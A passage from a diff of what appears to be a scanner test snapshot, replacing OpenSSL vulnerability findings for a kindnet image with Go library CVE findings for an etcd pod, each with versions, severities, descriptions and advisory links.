'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-23841", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.7.0", + "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", "references": [ - "http://seclists.org/fulldisclosure/2021/May/67", - "http://seclists.org/fulldisclosure/2021/May/68", - "http://seclists.org/fulldisclosure/2021/May/70", - "https://access.redhat.com/security/cve/CVE-2021-23841", - "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", - "https://github.com/advisories/GHSA-84rm-qf37-fgc2", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", - "https://linux.oracle.com/cve/CVE-2021-23841.html", - "https://linux.oracle.com/errata/ELSA-2021-9561.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", - "https://rustsec.org/advisories/RUSTSEC-2021-0058", - "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210219-0009/", - "https://security.netapp.com/advisory/ntap-20210513-0002/", - "https://support.apple.com/kb/HT212528", - "https://support.apple.com/kb/HT212529", - "https://support.apple.com/kb/HT212534", - "https://ubuntu.com/security/notices/USN-4738-1", - "https://ubuntu.com/security/notices/USN-4745-1", - "https://www.cve.org/CVERecord?id=CVE-2021-23841", - "https://www.debian.org/security/2021/dsa-4855", - "https://www.openssl.org/news/secadv/20210216.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-03", - "https://www.tenable.com/security/tns-2021-09", + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", ], }, "category": "Vulnerability", - "description": "The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "openssl: NULL pointer dereference in X509_issuer_and_serial_hash()", + "name": "avoid quadratic complexity in HPACK decoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-23841", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/May/67", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/May/68", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/May/70", + "value": "https://go.dev/cl/468135", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-23841", + "value": "https://go.dev/cl/468295", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-84rm-qf37-fgc2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-23841.html", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.4.0", + "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", + ], + }, + "category": "Vulnerability", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212528", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212529", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212534", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4738-1", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4745-1", + "value": "https://go.dev/cl/455635", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-23841", + "value": "https://go.dev/cl/455717", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4855", + "value": "https://go.dev/issue/56350", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210216.txt", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-03", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, ], "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.1.1d-0+deb10u6", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3449", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20210615035016-665e8c7367d1", + "packageName": "golang.org/x/sys", "references": [ - "http://www.openwall.com/lists/oss-security/2021/03/27/1", - "http://www.openwall.com/lists/oss-security/2021/03/27/2", - "http://www.openwall.com/lists/oss-security/2021/03/28/3", - "http://www.openwall.com/lists/oss-security/2021/03/28/4", - "https://access.redhat.com/security/cve/CVE-2021-3449", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", - "https://github.com/advisories/GHSA-83mx-573x-5rw9", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", - "https://linux.oracle.com/cve/CVE-2021-3449.html", - "https://linux.oracle.com/errata/ELSA-2021-9151.html", - "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", - "https://rustsec.org/advisories/RUSTSEC-2021-0055", - "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", - "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210326-0006/", - "https://security.netapp.com/advisory/ntap-20210513-0002/", - "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", - "https://ubuntu.com/security/notices/USN-4891-1", - "https://ubuntu.com/security/notices/USN-5038-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3449", - "https://www.debian.org/security/2021/dsa-4875", - "https://www.openssl.org/news/secadv/20210325.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-05", - "https://www.tenable.com/security/tns-2021-06", - "https://www.tenable.com/security/tns-2021-09", - "https://www.tenable.com/security/tns-2021-10", + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", ], }, "category": "Vulnerability", - "description": "An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "openssl: NULL pointer dereference in signature_algorithms processing", + "name": "faccessat checks wrong group", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3449", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3449", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", + "value": "https://github.com/golang/go/issues/52313", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-83mx-573x-5rw9", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "value": "https://go.dev/cl/400074", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3449.html", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", }, { "type": "URL", - "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4891-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "0.3.7", + "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-38561", + "installedVersion": "v0.3.6", + "packageName": "golang.org/x/text", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-38561", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", + "https://deps.dev/advisory/OSV/GO-2021-0113", + "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "https://go.dev/cl/340830", + "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "https://groups.google.com/g/golang-announce", + "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "https://pkg.go.dev/golang.org/x/text/language", + "https://pkg.go.dev/vuln/GO-2021-0113", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2021-38561", + ], + }, + "category": "Vulnerability", + "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5038-1", + "value": "https://avd.aquasec.com/nvd/cve-2021-38561", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3449", + "value": "https://access.redhat.com/security/cve/CVE-2021-38561", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4875", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210325.txt", + "value": "https://deps.dev/advisory/OSV/GO-2021-0113", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://go.dev/cl/340830", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-05", + "value": "https://pkg.go.dev/golang.org/x/text/language", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-06", + "value": "https://pkg.go.dev/vuln/GO-2021-0113", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-10", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1d-0+deb10u8", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-4160", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.3.8", + "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.6", + "packageName": "golang.org/x/text", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-4160", - "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3bf7b73ea7123045b8f972badc67ed6878e6c37f", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6fc1aaaf303185aa5e483e06bdfae16daa9193a7", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e9e726506cd2a3fd9c0f12daf8cc1fe934c7dddb", - "https://nvd.nist.gov/vuln/detail/CVE-2021-4160", - "https://security.gentoo.org/glsa/202210-02", - "https://www.cve.org/CVERecord?id=CVE-2021-4160", - "https://www.debian.org/security/2022/dsa-5103", - "https://www.openssl.org/news/secadv/20220128.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", ], }, "category": "Vulnerability", - "description": "There is a carry propagation bug in the MIPS32 and MIPS64 squaring procedure. Many EC algorithms are affected, including some of the TLS 1.3 default curves. Impact was not analyzed in detail, because the pre-requisites for attack are considered unlikely and include reusing private keys. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH private key among multiple clients, which is no longer an option since CVE-2016-0701. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0.0. It was addressed in the releases of 1.1.1m and 3.0.1 on the 15th of December 2021. For the 1.0.2 release it is addressed in git commit 6fc1aaaf3 that is available to premium support customers only. It will be made available in 1.0.2zc when it is released. The issue only affects OpenSSL on MIPS platforms. Fixed in OpenSSL 3.0.1 (Affected 3.0.0). Fixed in OpenSSL 1.1.1m (Affected 1.1.1-1.1.1l). Fixed in OpenSSL 1.0.2zc-dev (Affected 1.0.2-1.0.2zb).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "openssl: Carry propagation bug in the MIPS32 and MIPS64 squaring procedure", + "name": "ParseAcceptLanguage takes a long time to parse complex tags", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-4160", 